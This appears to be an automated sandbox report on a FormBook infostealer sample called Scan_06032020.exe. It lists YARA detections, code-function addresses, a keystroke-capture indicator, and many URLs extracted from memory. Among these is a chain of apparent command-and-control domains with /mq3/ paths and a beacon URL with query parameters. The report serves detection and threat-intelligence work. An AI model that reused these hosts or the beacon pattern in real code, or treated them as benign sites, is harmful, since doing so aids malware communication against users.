63 6f 22 20 2f 3e 0a 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 50 72 6f 78 69 6d 61 20 4e 6f 76 61 27 3b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 22 29 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 3f 23 69 65 66 69 78 22 29 20 66 6f 72 6d 61 74 28 22 65 6d 62 65 64 64
 Urls found in memory or binary data Show sources
 Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com Source: explorer.exe, 00000005.00000000.560432526.0000000002630000.00000004.00000001.sdmp String found in binary or memory: http://ns.adob1 Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.3dcellmodelscongress.com Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.3dcellmodelscongress.com/mq3/ Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.3dcellmodelscongress.com/mq3/www.tams.rocks Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.3dcellmodelscongress.comReferer: Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.aaronnational.com Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.aaronnational.com/mq3/ Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.aaronnational.com/mq3/www.askcopdtreatmentok.live Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.aaronnational.comReferer: Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.askcopdtreatmentok.live Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.askcopdtreatmentok.live/mq3/ Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.askcopdtreatmentok.live/mq3/www.snagabag31.com Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.askcopdtreatmentok.liveReferer: Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.greenerpharms.com Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.greenerpharms.com/mq3/ Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.greenerpharms.com/mq3/www.sj233.com Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.greenerpharms.comReferer: Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp, NETSTAT.EXE, 00000006.00000002.1162864887.0000000003A79000.00000004.00000001.sdmp String found in binary or memory: http://www.hugoph.com Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp, NETSTAT.EXE, 00000006.00000002.1162864887.0000000003A79000.00000004.00000001.sdmp String found in binary or memory: http://www.hugoph.com/mq3/ Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.hugoph.com/mq3/www.xn--3bst11cpvj0o2a.com Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.hugoph.comReferer: Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.icbjesusdenazaret.net Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.icbjesusdenazaret.net/mq3/ Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.icbjesusdenazaret.net/mq3/www.porcber.com Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.icbjesusdenazaret.netReferer: Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/ Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.operatorcloud.net Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.operatorcloud.net/mq3/ Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.operatorcloud.net/mq3/www.aaronnational.com Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.operatorcloud.netReferer: Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.porcber.com Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.porcber.com/mq3/ Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.porcber.com/mq3/www.hugoph.com Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.porcber.comReferer: Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.r-ev-ival.com Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.r-ev-ival.com/mq3/ Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.r-ev-ival.com/mq3/www.operatorcloud.net Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.r-ev-ival.comReferer: Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.rolex218238.com Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.rolex218238.com/mq3/ Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.rolex218238.com/mq3/www.greenerpharms.com Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.rolex218238.comReferer: Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.sj233.com Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.sj233.com/mq3/ Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.sj233.com/mq3/www.wwwx36599.com Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.sj233.comReferer: Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.snagabag31.com Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.snagabag31.com/mq3/ Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.snagabag31.com/mq3/www.3dcellmodelscongress.com Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.snagabag31.comReferer: Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.tams.rocks Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.tams.rocks/mq3/ Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.tams.rocks/mq3/www.yoxi.ltd Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.tams.rocksReferer: Source: ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.wwwx36599.com Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.wwwx36599.com/mq3/ Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.wwwx36599.com/mq3/S Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.wwwx36599.comReferer: Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.xn--3bst11cpvj0o2a.com Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.xn--3bst11cpvj0o2a.com/mq3/ Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.xn--3bst11cpvj0o2a.com/mq3/www.r-ev-ival.com Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.xn--3bst11cpvj0o2a.comReferer: Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.yoxi.ltd Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.yoxi.ltd/mq3/ Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.yoxi.ltd/mq3/www.rolex218238.com Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp String found in binary or memory: http://www.yoxi.ltdReferer: Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn Source: ufipp6ljxlz.exe, 00000010.00000002.880761472.0000000003210000.00000004.00000001.sdmp String found in binary or memory: https://github.com/KamilBest/2048Game Source: NETSTAT.EXE, 00000006.00000002.1159788515.0000000002E38000.00000004.00000001.sdmp String found in binary or memory: https://ogs.google.com/widget/callout?hl=en&origin=https%3A%2F%2Fwww.google.ch&pid=1&spid=1&prid=190 Source: NETSTAT.EXE, 00000006.00000002.1163098006.0000000003D6F000.00000004.00000001.sdmp String found in binary or memory: https://www.hugoph.com/mq3/?1bxh=3fSHFPhPtFX80vu0&qFNHgHIH=KqoVQGmIJAwVdvnbXHFhC3/cGIUPqT0Z2GEszuVtR

 Creates a DirectInput object (often for capturing keystrokes) Show sources
 Source: Scan_06032020.exe, 00000000.00000002.556283565.0000000000DD0000.00000004.00000020.sdmp Binary or memory string:

### E-Banking Fraud:

 Yara detected FormBook Show sources
 Source: Yara match File source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.558930048.00000000043CC000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000012.00000002.895810906.0000000000340000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 4.2.Scan_06032020.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 17.2.ufipp6ljxlz.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 4.2.Scan_06032020.exe.400000.0.unpack, type: UNPACKEDPE

### System Summary:

 Detected FormBook malware Show sources
 Malicious sample detected (through community Yara rule) Show sources
 Source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.558930048.00000000043CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.558930048.00000000043CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000012.00000002.895810906.0000000000340000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000012.00000002.895810906.0000000000340000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 4.2.Scan_06032020.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 4.2.Scan_06032020.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 17.2.ufipp6ljxlz.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 17.2.ufipp6ljxlz.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 4.2.Scan_06032020.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 4.2.Scan_06032020.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
 Contains functionality to call native functions Show sources
 Detected potential crypto function Show sources
 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_01012208 0_2_01012208 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_01010472 0_2_01010472 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_01010FC0 0_2_01010FC0 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_01013110 0_2_01013110 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_01011839 0_2_01011839 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_01014B80 0_2_01014B80 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_01014B90 0_2_01014B90 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_01010F2C 0_2_01010F2C Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_01012FCE 0_2_01012FCE Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_010151D8 0_2_010151D8 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_010151E8 0_2_010151E8 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_010130A9 0_2_010130A9 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_010130BC 0_2_010130BC Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_010153F8 0_2_010153F8 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_01015408 0_2_01015408 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_0101F7F0 0_2_0101F7F0 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_010156A0 0_2_010156A0 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_010156B0 0_2_010156B0 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_01013F79 0_2_01013F79 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_01013F88 0_2_01013F88 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_09DDF798 0_2_09DDF798 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_09DDF78A 0_2_09DDF78A Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_0B1C4151 0_2_0B1C4151 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_0B1C30D8 0_2_0B1C30D8 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_0B1C2650 0_2_0B1C2650 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_0B1C4490 0_2_0B1C4490 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_0B1C4207 0_2_0B1C4207 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_0B1C310D 0_2_0B1C310D Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_0B1C1030 0_2_0B1C1030 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_0B1C1020 0_2_0B1C1020 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 0_2_0B1C30C9 0_2_0B1C30C9 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 4_2_00401030 4_2_00401030 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 4_2_0041D9C8 4_2_0041D9C8 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 4_2_00402D89 4_2_00402D89 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 4_2_00402D90 4_2_00402D90 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 4_2_0041DEEC 4_2_0041DEEC Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 4_2_00409F5B 4_2_00409F5B Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 4_2_00409F60 4_2_00409F60 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 4_2_00402FB0 4_2_00402FB0 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_0341FB40 6_2_0341FB40 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034263C2 6_2_034263C2 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_03424B96 6_2_03424B96 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_033FEBE0 6_2_033FEBE0 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_03424A5B 6_2_03424A5B Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034B0A02 6_2_034B0A02 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034CE214 6_2_034CE214 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_0342523D 6_2_0342523D Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034C22DD 6_2_034C22DD Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034C1A99 6_2_034C1A99 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034142B0 6_2_034142B0 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_0342594B 6_2_0342594B Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_03449906 6_2_03449906 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_03427110 6_2_03427110 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034B61DF 6_2_034B61DF Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034C19E2 6_2_034C19E2 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_03426180 6_2_03426180 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034CD9BE 6_2_034CD9BE Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_03421070 6_2_03421070 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_03429810 6_2_03429810 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034BD016 6_2_034BD016 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_0342E020 6_2_0342E020 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_03420021 6_2_03420021 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034248CB 6_2_034248CB Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034C28E8 6_2_034C28E8 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_0340A080 6_2_0340A080 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 6_2_034A18B6 6_2_034A18B6 